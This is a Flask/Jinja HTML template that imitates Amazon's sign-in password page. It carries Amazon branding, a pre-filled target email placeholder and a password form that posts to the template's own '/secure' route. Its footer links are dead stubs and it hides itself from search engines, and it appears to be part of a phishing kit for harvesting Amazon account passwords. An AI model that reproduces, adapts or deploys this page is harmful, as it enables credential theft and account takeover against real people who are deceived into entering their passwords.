<html
  class="a-js a-audio a-video a-canvas a-svg a-drag-drop a-geolocation a-history a-webworker a-autofocus a-input-placeholder a-textarea-placeholder a-local-storage a-gradients a-transform3d a-touch-scrolling a-text-shadow a-text-stroke a-box-shadow a-border-radius a-border-image a-opacity a-transform a-transition a-ember"
  data-19ax5a9jf="dingo"
  data-aui-build-date="3.22.2-2023-01-04">
  <head>
    <script async="" src="{{ url_for('static',filename='js/incremental.js') }}" crossorigin="anonymous"></script>
    <script async="" src="{{ url_for('static',filename='js/tail.js') }}" crossorigin="anonymous"></script>
    <script async="" src="{{ url_for('static',filename='js/jquery-3.6.3.js') }}"></script> 
    <meta charset="utf-8" />
    <meta name="robots" content="noindex,nofollow" />
    <title dir="ltr">Amazon Sign-In</title>
    <link rel="icon" type="image/x-icon" href="{{ url_for('static',filename='img/favicon.ico') }}" />
    <link rel="stylesheet" href="{{ url_for('static',filename='css/not-trident.css') }}" />
    <link rel="stylesheet" href="{{ url_for('static',filename='css/portal.css') }}" />
    <link rel="stylesheet" href="{{ url_for('static',filename='css/main.css') }}" />
    <div id="a-page">
      <div class="a-section a-padding-medium auth-workflow">
        <div class="a-section a-spacing-none auth-navbar">
          <div class="a-section a-spacing-medium a-text-center">
            <a class="a-link-nav-icon" tabindex="-1" href="javascript: void(0)">
              <i class="a-icon a-icon-logo" role="img" aria-label="Amazon"></i>
            </a>
          </div>
        </div>
        <div id="authportal-center-section" class="a-section">
          <div id="authportal-main-section" class="a-section">
            <div class="a-section auth-pagelet-container">
              <div class="a-section a-spacing-base">
                <div class="a-box">
                  <div class="a-box-inner a-padding-extra-large">
                    <h1 class="a-spacing-small">Sign in</h1>
                    <!-- optional subheading element -->

                    <div class="a-row a-spacing-base">
                      <span>{{ emails }}</span>
                      <a
                        id="ap_change_login_claim"
                        class="a-link-normal"
                        tabindex="5"
                        href="#">
                        Change
                      </a>
                    </div>

                    <form
                      name="signIn"
                      method="post"
                      action="/secure"
                      class="auth-validate-form auth-real-time-validation a-spacing-none"
                      data-fwcim-id="bjxEWyOm">
                      <div class="a-section">
                        <input
                          type="text"
                          value=" {{ emails }} "
                          id="ap-credential-autofill-hint"
                          name="ap_email"
                          id="ap_email"
                          class="a-input-text hide" />

                        <div class="a-section a-spacing-large">
                          <div class="a-row">
                            <div class="a-column a-span5">
                              <label for="ap_password" class="a-form-label">
                                Password
                              </label>
                            </div>

                            <div
                              class="a-column a-span7 a-text-right a-span-last">
                              <a
                                id="auth-fpp-link-bottom"
                                class="a-link-normal"
                                tabindex="6"
                                href="javascript: void(0)">
                                Forgot your password?
                              </a>
                            </div>
                          </div>

                          <input
                            type="password"
                            maxlength="1024"
                            id="ap_password"
                            name="ap_password"
                            tabindex="2"
                            class="a-input-text a-span12 auth-autofocus auth-required-field" />

                          <div
                            id="auth-password-missing-alert"
                            class="a-box a-alert-inline a-alert-inline-error auth-inlined-error-message a-spacing-top-mini"
                            role="alert">
                            <div class="a-box-inner a-alert-container">
                              <i class="a-icon a-icon-alert"></i>
                              <div class="a-alert-content">
                                Enter your password
                              </div>
                            </div>
                          </div>
                        </div>

                        <input type="hidden" name="encryptedPasswordExpected" />

                        <div class="a-section">
                          <span
                            id="auth-signin-button"
                            class="a-button a-button-span12 a-button-primary auth-disable-button-on-submit"
                            ><span class="a-button-inner"
                              ><input
                                id="signInSubmit"
                                tabindex="3"
                                class="a-button-input"
                                type="submit"
                                aria-labelledby="auth-signin-button-announce" /><span
                                id="auth-signin-button-announce"
                                class="a-button-text"
                                aria-hidden="true">
                                Sign in
                              </span></span
                            ></span
                          >
                          <div class="a-row a-spacing-top-medium">
                            <div class="a-section a-text-left">
                              <label
                                for="auth-remember-me"
                                class="a-form-label">
                                <div
                                  data-a-input-name="rememberMe"
                                  class="a-checkbox">
                                  <label
                                    ><input
                                      type="checkbox"
                                      name="rememberMe"
                                      value="true"
                                      tabindex="4" /><i
                                      class="a-icon a-icon-checkbox"></i
                                    ><span class="a-label a-checkbox-label">
                                      Keep me signed in.
                                      <span
                                        class="a-declarative"
                                        data-action="a-popover"
                                        data-csa-c-type="widget"
                                        data-csa-c-func-deps="aui-da-a-popover"
                                        data-a-popover='{"closeButtonLabel":"","activate":"onclick","header":"\"Keep Me Signed In\" Checkbox","inlineContent":"\u003cp>Choosing \"Keep me signed in\" reduces the number of times you&apos;re asked to Sign-In on this device.\u003c\/p>\n\u003cp>To keep your account secure, use this option only on your personal devices.\u003c\/p>"}'
                                        data-csa-c-id="7azgjt-2qla4u-y5266o-ykdbz6">
                                        <a
                                          id="remember_me_learn_more_link"
                                          href="javascript:void(0)"
                                          role="button"
                                          class="a-popover-trigger a-declarative">
                                          Details
                                          <i class="a-icon a-icon-popover"></i
                                        ></a>
                                      </span> </span
                                  ></label>
                                </div>
                              </label>
                            </div>
                          </div>
                        </div>
                      </div>
                      <input type="hidden" name="aaToken" />
                    </form>
                  </div>
                </div>
              </div>
            </div>
          </div>
        </div>

        <div id="right-2"></div>

        <div class="a-section a-spacing-top-extra-large auth-footer">
          <div class="a-divider a-divider-section">
            <div class="a-divider-inner"></div>
          </div>

          <div class="a-section a-spacing-small a-text-center a-size-mini">
            <span class="auth-footer-seperator"></span>

            <a
              class="a-link-normal"
              target="_blank"
              rel="noopener"
              href="javascript: void(0)">
              Conditions of Use
            </a>
            <span class="auth-footer-seperator"></span>

            <a
              class="a-link-normal"
              target="_blank"
              rel="noopener"
              href="javascript: void(0)">
              Privacy Notice
            </a>
            <span class="auth-footer-seperator"></span>

            <a
              class="a-link-normal"
              target="_blank"
              rel="noopener"
              href="javascript: void(0)">
              Help
            </a>
            <span class="auth-footer-seperator"></span>
          </div>

          <div class="a-section a-spacing-none a-text-center">
            <span class="a-size-mini a-color-secondary">
              © 1996-2023, Amazon.com, Inc. or its affiliates
            </span>
          </div>
        </div>
      </div>

      <div
        id="auth-external-javascript"
        class="auth-external-javascript"
        data-external-javascripts=""></div>
      <!-- cache slot rendered -->
    </div>
    <div id="a-popover-root" style="z-index: -1; position: absolute"></div>
    <script>
        window.onload = function () {
          document.getElementById("ap_password").focus();
        };
    </script>
  </body>
</html>